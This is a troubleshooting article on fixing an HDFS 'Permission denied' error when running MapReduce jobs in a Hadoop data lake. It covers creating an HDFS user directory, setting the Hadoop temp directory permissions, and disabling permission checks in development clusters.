Error while batch processing of rest data persisted in Basic Hadoop based (HDFS) Data Lake “Permission denied: user=dr.who, access=READ_EXECUTE, inode=”/tmp”:hdadmin:supergroup:drwx……..”


Typically, persisting unstructured data and then batch-processing it can be very costly, which makes it hard to justify for small organizations and startups, where cost is the prime factor.

A Hadoop-based Data Lake using MapReduce fits this scenario perfectly: it is not only cost-effective but also scalable and easy to extend further. Though it may sound like a great option, we might face issues while setting it up, and one of the most common is the error “Permission denied: user=dr.who, access=READ_EXECUTE, inode=”/tmp”:hdadmin:supergroup:drwx……..”.

It occurs when:

  1. We submit the MapReduce job to the multi-node cluster from the command prompt without creating a new HDFS user,
  2. We missed setting the Hadoop temp directory location in the core-site.xml file, or
  3. We missed changing the access privileges on the HDFS directory /user before starting the cluster, which is mandatory.

Here are two tips to avoid such exceptions and allow MapReduce jobs to execute.

  1. Create a new HDFS user
    Create a new HDFS user by creating a directory under the /user directory; this directory serves as the HDFS “home” directory for that user. Before doing this, the required permissions should also be set on the Hadoop temp directory.

$ hdfs dfs -mkdir /user/<new hdfs user directory name>
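The step above can be sketched in full as follows; the user name "analyst" is a hypothetical placeholder (replace it with your own), and the chown step assumes you want the new user, rather than hdadmin, to own the home directory:

```shell
# Hypothetical HDFS user name -- substitute your own.
NEW_USER="analyst"
USER_HOME="/user/${NEW_USER}"

# Create the HDFS home directory for the new user (-p creates /user too if missing).
hdfs dfs -mkdir -p "${USER_HOME}"

# Hand ownership of the home directory to the new user.
hdfs dfs -chown "${NEW_USER}:${NEW_USER}" "${USER_HOME}"
```

Run these as a user with HDFS superuser rights (here, hdadmin), since only the superuser can create directories directly under /user and change their ownership.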

If we do not set this parameter, Hadoop will, by default, create the directories dfs and nm-local-dir.

Since we did not set the parameter in core-site.xml and logged in to the system as hdadmin, the directories dfs and nm-local-dir got created.

We should make sure to set the permissions on the Hadoop temp directory, as already specified in the core-site.xml file:

$ hdfs dfs -chmod -R 777 /tmp

<property>
 <name>hadoop.tmp.dir</name>
 <value>/tmp/hadoop-${user.name}</value>
</property>

  2. Change the value of the property “dfs.permissions.enabled” from “true” to “false” in hdfs-site.xml

This option should only be considered for a cluster in a development environment or a POC exercise; it is not advisable in production, where security and authorization on the ingested data must remain intact.

<property>
 <name>dfs.permissions.enabled</name>
 <value>false</value>
</property>

Once we set it to false, permission checking is turned off, but all other behavior stays unchanged. Switching from one value to the other does not change the mode, owner, or group of any files or directories.
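A configuration edit in hdfs-site.xml only takes effect after HDFS is restarted. A minimal sketch, assuming a standard $HADOOP_HOME/sbin layout (adjust the paths for your install):

```shell
# Sanity-check that hdfs-site.xml really carries the new value before restarting.
grep -A1 'dfs.permissions.enabled' "$HADOOP_HOME/etc/hadoop/hdfs-site.xml"

# Restart HDFS so the NameNode picks up the change.
"$HADOOP_HOME/sbin/stop-dfs.sh"
"$HADOOP_HOME/sbin/start-dfs.sh"
```

The grep should show `<value>false</value>` on the line after the property name; if it still shows `true`, the edit was made to the wrong copy of the file.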

By Gautam Goswami
